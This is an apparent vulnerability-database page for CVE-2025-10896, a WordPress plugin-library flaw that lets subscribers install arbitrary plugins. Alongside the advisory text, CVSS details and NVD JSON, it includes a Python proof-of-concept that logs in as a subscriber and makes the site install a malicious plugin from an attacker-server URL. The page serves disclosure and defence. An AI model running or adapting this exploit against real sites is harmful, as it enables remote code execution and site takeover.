Security Vulnerability Report
中文
CVE-2025-10896 CVSS 8.8 HIGH

CVE-2025-10896

Published: 2025-11-04 05:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Multiple plugins for WordPress with the Jewel Theme Recommended Plugins Library are vulnerable to Unrestricted Upload of File with Dangerous Type via arbitrary plugin installation in all versions up to, and including, 1.0.2.3. This is due to missing capability checks on the '*_recommended_upgrade_plugin' function which allows arbitrary plugin URLs to be installed. This makes it possible for authenticated attackers with subscriber-level access and above to upload arbitrary plugin packages to the affected site's server via a crafted plugin URL, which may make remote code execution possible.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Jewel Theme Recommended Plugins Library <= 1.0.2.3
image-hover-effects-elementor-addon <= 1.0.2.3
image-comparison-elementor-addon <= 1.0.2.3
其他使用该插件库的所有WordPress插件 <= 1.0.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-10896 PoC - WordPress Plugin Library Arbitrary Plugin Installation # Target: WordPress sites with vulnerable Jewel Theme Recommended Plugins Library target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" # Malicious plugin URL (attacker-controlled) malicious_plugin_url = "http://attacker-server.com/malicious-plugin.zip" # Authentication with subscriber-level account session = requests.Session() login_data = { "log": "subscriber_user", "pwd": "subscriber_password", "wp-submit": "Log In" } # Step 1: Authenticate as subscriber login_response = session.post(f"{target_url}/wp-login.php", data=login_data) if "wordpress_logged_in" not in str(session.cookies): print("[-] Authentication failed") exit(1) print("[+] Authenticated as subscriber") # Step 2: Exploit the arbitrary plugin installation vulnerability # The vulnerable endpoint varies by plugin, commonly: exploit_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-admin/admin.php?page=recommended", ] for endpoint in exploit_endpoints: exploit_data = { "action": "image_hover_recommended_upgrade_plugin", # or similar action "plugin_url": malicious_plugin_url, "plugin_slug": "malicious-plugin" } response = session.post(f"{target_url}{endpoint}", data=exploit_data) if response.status_code == 200: print(f"[+] Exploit sent via {endpoint}") print(f"[+] Response: {response.text[:200]}") break print("\n[!] If successful, the malicious plugin is now installed and active") print("[!] Attacker can now execute arbitrary code via the malicious plugin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10896", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:15:49.360", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple plugins for WordPress with the Jewel Theme Recommended Plugins Library are vulnerable to Unrestricted Upload of File with Dangerous Type via arbitrary plugin installation in all versions up to, and including, 1.0.2.3. This is due to missing capability checks on the '*_recommended_upgrade_plugin' function which allows arbitrary plugin URLs to be installed. This makes it possible for authenticated attackers with subscriber-level access and above to upload arbitrary plugin packages to the affected site's server via a crafted plugin URL, which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/image-hover-effects-elementor-addon/tags/1.0.2.3/Libs/Assets.php#L70", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/image-hover-effects-elementor-addon/tags/1.0.2.3/Libs/Recommended.php#L334", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/image-hover-effects-elementor-addon/tags/1.0.2.3/Libs/Recommended.php#L43", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3384308%40image-hover-effects-elementor-addon&new=3384308%40image-hover-effects-elementor-addon", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389322%40image-comparison-elementor-addon&new=3389322%40image-comparison-elementor-addon", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389341%40content-locker-for-elementor&new=3389341%40content-locker-for-elementor&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3390374%40ultimate-blocks-for-gutenberg&new=3390374%40ultimate-blocks-for-gutenberg&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0ff3a292-3924-4823-867a-fedb2c1cdd00?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.